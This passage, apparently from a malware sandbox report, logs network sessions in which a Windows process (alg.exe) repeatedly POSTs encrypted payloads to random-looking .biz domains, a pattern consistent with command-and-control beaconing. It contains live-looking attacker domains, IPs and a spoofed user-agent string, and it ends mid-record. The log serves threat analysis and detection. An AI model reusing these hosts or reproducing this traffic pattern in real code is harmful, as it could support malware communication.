                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.10 | 50030 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:38.930005074 CET | 345 | OUT | POST /vwka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:38.930128098 CET | 778 | OUT | Data Raw: a4 61 3e 9b 14 ab d5 b8 fe 02 00 00 1f 12 ea 66 89 31 23 ab 62 e9 59 ed 29 32 13 8d 57 8e 75 c3 7d c4 65 1a 17 2c 4b 50 eb 89 fc 00 fa 56 f0 f0 d4 2a 78 5f 1c 64 0c de df 32 f8 37 3e 54 e9 82 49 97 8c 9c f3 6d 3c c2 2d 1e d2 ca b4 27 63 9d de 62
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a>f1#bY)2Wu}e,KPV*x_d27>TIm<-'cb7$k:XF*R~mTx@;;5ezYU$^mNyZW^9XiTRcoSI@Y8f?+mXG!GJpj</}Y,g)&^DHAxf^}
Nov 18, 2024 09:58:39.592175007 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9b3d5d3f53d4e5b72de06531f9d06d8|155.94.241.187|1731920319|1731920319|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.10 | 50031 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:39.189702034 CET | 356 | OUT | POST /awclfrtxgvu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:58:39.189726114 CET | 834 | OUT | Data Raw: de 6b da fb 3a c4 c2 a5 36 03 00 00 21 6e be bb 6a fb 8c 5b 28 f4 5f b0 80 2f 18 9b ec 67 e8 70 40 b2 a8 06 77 f1 b9 22 e2 3f 32 14 0e 47 c7 25 8d b3 f4 f5 78 84 18 aa db 13 a6 b7 58 de 20 f4 c2 e9 fc 98 70 49 be fb 50 41 de b3 5d 61 36 c5 c8 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k:6!nj[(_/gp@w"?2G%xX pIPA]a6OsikKvf)|M(jU-,yer).E"18UiU2n]oo.H?.J#d5GB%}*C*YX;`+4[)7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.10 | 50032 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:39.821702003 CET | 357 | OUT | POST /hppmgsitpcfjw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:39.821743011 CET | 778 | OUT | Data Raw: 4d 46 4c 17 11 42 c0 c9 fe 02 00 00 80 8d c2 c1 1e e6 c1 97 59 75 ca f4 76 b0 7b 6b 1d 50 18 08 3f a8 d0 2b 8c 24 68 fd 9d 94 ab 49 d9 9a 58 2b 92 ae 86 65 55 83 7c 0b 66 73 d9 06 c5 4a 7f f2 77 53 03 38 af 55 ec d6 54 af 56 be b5 a0 5a 19 80 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MFLBYuv{kP?+$hIX+eU|fsJwS8UTVZ\]D}X:c/E.-dt;22p|>uRdLw:=mPObbi2ZNV4]p$NKbG\v2J|.5):PRVgb>
Nov 18, 2024 09:58:40.482261896 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=54a923f0651cf0c7a0e17e320bcd1da5|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.10 | 50033 | 18.141.10.107 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:41.399964094 CET | 359 | OUT | POST /ggbuhmxfarcrplg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:41.399991035 CET | 778 | OUT | Data Raw: b6 8a c0 bb e5 41 10 aa fe 02 00 00 52 ad 44 79 7a 37 b4 c2 79 d7 53 5e 8a 5f 56 0f 04 dc d6 6a 62 a5 21 a9 3d 01 a5 99 27 40 3b 85 a2 c5 85 ee a6 6a ea 88 fe 09 63 7c e3 ca e7 b8 a7 56 c4 6a ff f5 fd a6 39 99 4b e1 8f ee f2 93 a0 09 73 68 4d 4a
Data Ascii: ARDyz7yS^_Vjb!='@;jc|Vj9KshMJ6(`Q$-|XP-hG!"?RVAIFQG>gFD*H>.q{2n)"Rb;& %q*~F(6B;h=g1d7Z@x*ElH$t\%(
Nov 18, 2024 09:58:42.852495909 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5f3d665833ea710de10ec82bcb3034ff|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.10 | 50034 | 18.246.231.120 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:44.006525040 CET | 343 | OUT | POST /cl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:44.006525040 CET | 778 | OUT | Data Raw: 19 88 6a a6 fb cd 13 7e fe 02 00 00 6c 10 3a 9d 3a ba ce 66 5f 96 8a e1 4a 8c 35 1e c8 ab fd b5 2a d6 d7 60 aa fd a3 99 0b a7 60 44 e4 a5 a3 3f dc 87 8d c0 9d ef ff be 96 3c 82 09 cf ed 6b 61 0a e3 26 61 af ec d3 1a a3 8b 57 90 e7 9e 67 1e 25 6f
Data Ascii: j~l::f_J5*``D?<ka&aWg%og$r|DMv6i'*<*bgqrbs8~F}5fd]>:wI&ff[W*=d}d1vq*8_8Cg^j|+=@h}@w_R
Nov 18, 2024 09:58:44.837762117 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7c71ac157bb27d44212de8acb8c7b25c|155.94.241.187|1731920324|1731920324|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.10 | 50035 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:44.989088058 CET | 358 | OUT | POST /vommasbpmwjrwo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:44.989120007 CET | 778 | OUT | Data Raw: a6 b8 d2 03 a0 2c 8f c7 fe 02 00 00 a5 05 f1 44 84 3a ad f3 b2 d8 5e a0 2a e6 48 7e de f7 82 6d a6 c5 d7 38 7f 2f 2f b6 84 55 15 f1 15 74 a9 e7 43 a3 4e 85 3c bc 23 e5 91 6d 18 99 fe 93 87 fc 58 c0 48 95 86 43 f2 6b 10 98 09 c3 f6 a8 aa b9 87 72
Data Ascii: ,D:^*H~m8//UtCN<#mXHCkr0B[@P DHma948LzNK\zvt5cKMvuH!F%tm.oS7e2n\U3|W|(OK&$QyIsa9U/['f:
Nov 18, 2024 09:58:45.656181097 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1555a8d4c0ac5a674394a1862f4c4173|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.10 | 50036 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:45.993643045 CET | 353 | OUT | POST /joygyaofiuw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.993643045 CET778OUTData Raw: 2f 47 33 08 2d 80 32 4c fe 02 00 00 52 25 6c 16 c1 39 7b f2 15 f3 58 73 21 d1 a5 6f dc b0 6a e3 31 2e 4f d1 f5 5f 0b 15 99 ea d1 33 b1 f8 40 f0 23 bf 1c e6 dd 64 0f b4 98 32 41 71 f7 26 4e f0 e5 21 5b d2 4f e5 15 e4 eb 98 ad b9 fe 20 26 92 78 da
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /G3-2LR%l9{Xs!oj1.O_3@#d2Aq&N![O &x=LaWV9v%?,9HY;2_36XP!)nMZT6"GXcar{ooCfv^MMN+}:)0Zbf-Am/T;Dm>#]e>:'hHu[
Nov 18, 2024 09:58:47.446366072 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1f07995ed8081ebaeffeab07148c6183|155.94.241.187|1731920327|1731920327|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.10 | 50037 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:47.611001015 CET | 360 | OUT | POST /jvdwdelnnjmgtxf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.611001015 CET778OUTData Raw: 01 18 ac 97 53 57 91 45 fe 02 00 00 bb 51 65 77 4d 78 23 93 f0 2e 10 b6 f3 3b b2 96 d8 8a 4c b8 be 8a 49 68 82 31 53 d5 c9 90 d6 c3 0f 11 44 50 dd 59 dd d6 2a 49 21 da a2 b7 da 9b ce bb 54 dd 8b 70 5f 2d 78 2f 7a 45 96 1c ba 25 d8 4b fc d1 97 8d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: SWEQewMx#.;LIh1SDPY*I!Tp_-x/zE%KhGh^sK|U\&P4aZ$%Kt#><A(DEWs:Qa{-S"d8c~?I+^6P;\@~ +iv~G
Nov 18, 2024 09:58:49.055046082 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=89ce539a81ccdf7c72a0585ecbdbdd7d|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.10 | 50038 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:47.688400984 CET | 357 | OUT | POST /mhdtcntnalxh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.688426018 CET834OUTData Raw: 4b 19 2b 32 55 78 dc f9 36 03 00 00 08 8d a2 a1 03 6f 30 12 32 92 09 86 52 2f cf d9 b0 e5 41 dd 2b 5c 4b 12 a2 41 b3 03 26 01 83 01 c6 73 00 6b fd 19 8a 99 e6 d2 31 d1 2f 44 2e 5d 03 01 2f 5c 24 48 ba 0a 1e 0b e2 0f 00 cd 39 53 e6 47 5f 51 1e 98
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K+2Ux6o02R/A+\KA&sk1/D.]/\$H9SG_Q?XJq2H%qKC_)+K.f)7l^c7R \8wGCn9M!A1[0Q{^6q6V-Q0glv)rPtl0AK_eq?s<{ze-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.10 | 50039 | 34.211.97.45 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:49.313756943 CET | 353 | OUT | POST /kgdhcykbe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.313783884 CET778OUTData Raw: 6c 40 e5 05 2a 1a 5d d0 fe 02 00 00 71 34 a5 8a ea 93 b7 21 28 69 ac 77 0c 1a b9 e3 06 fa e1 2c 0c ae 00 80 3e 77 cd 45 c5 5c 3f 6a 57 c2 4a 13 19 bc 82 d0 56 cc c3 24 66 ef fc c4 34 7a d5 f8 ad 6c 54 f2 58 8f 3b 96 1e 17 ea 71 c0 c2 e3 c5 ac 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l@*]q4!(iw,>wE\?jWJV$f4zlTX;q\J$plG?b]=jk>>:y{_abnJ$@J+B|3}S<vPmvx5{#f>"FHMb4wj[9.Gbx?
Nov 18, 2024 09:58:50.149583101 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3186e82f79967e55dca774423507d7a4|155.94.241.187|1731920330|1731920330|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.10 | 50040 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:50.363857031 CET | 358 | OUT | POST /efnfkaqjisfwrsut HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.363871098 CET778OUTData Raw: 78 86 2b 00 a2 0b d4 98 fe 02 00 00 4c 86 77 22 24 06 dc 27 b3 81 82 8e d5 40 5a 15 7e 84 0f 89 07 4a 05 15 f3 72 74 db 40 25 f2 b4 72 86 52 15 09 9a 58 41 b8 90 f5 38 d5 3b 35 b2 f5 d9 77 44 55 db 56 be 90 62 e6 c6 9d b4 a7 4a 0c 39 a2 f1 48 a6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x+Lw"$'@Z~Jrt@%rRXA8;5wDUVbJ9H&mKF/<tp9Un4hAPM;8{pe]tV&ju?mr?%a9x1dih1A~4Cvu0=e`&{H0B#q7e
Nov 18, 2024 09:58:51.847472906 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b270e253720c65eada9e4be610a76733|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.10 | 50041 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:52.218781948 CET | 345 | OUT | POST /xr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:52.218807936 CET778OUTData Raw: 7a 09 5c 4f df 64 e5 25 fe 02 00 00 77 35 78 12 74 89 d2 1b 0d 09 54 18 f4 69 d8 27 1d 5c 1f 7a 92 eb ce 5c ad f3 6b e9 ae b5 0d 6e f4 4b f0 7e ac 4a a2 24 8f 9b 52 68 b0 67 d4 74 0a 37 35 63 25 f6 f4 e0 8a 83 ed c3 2f 76 32 23 a2 c4 e6 69 d0 24
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z\Od%w5xtTi'\z\knK~J$Rhgt75c%/v2#i$mRri/\?nN_DA<+:BMR7p%N6rvma0d@l^M^q/*$;FEyNi8xLm=%V1u\L{1"D^/
Nov 18, 2024 09:58:53.670192003 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=45feb53b44ade53a61569a316f5227aa|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.10 | 50042 | 34.211.97.45 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
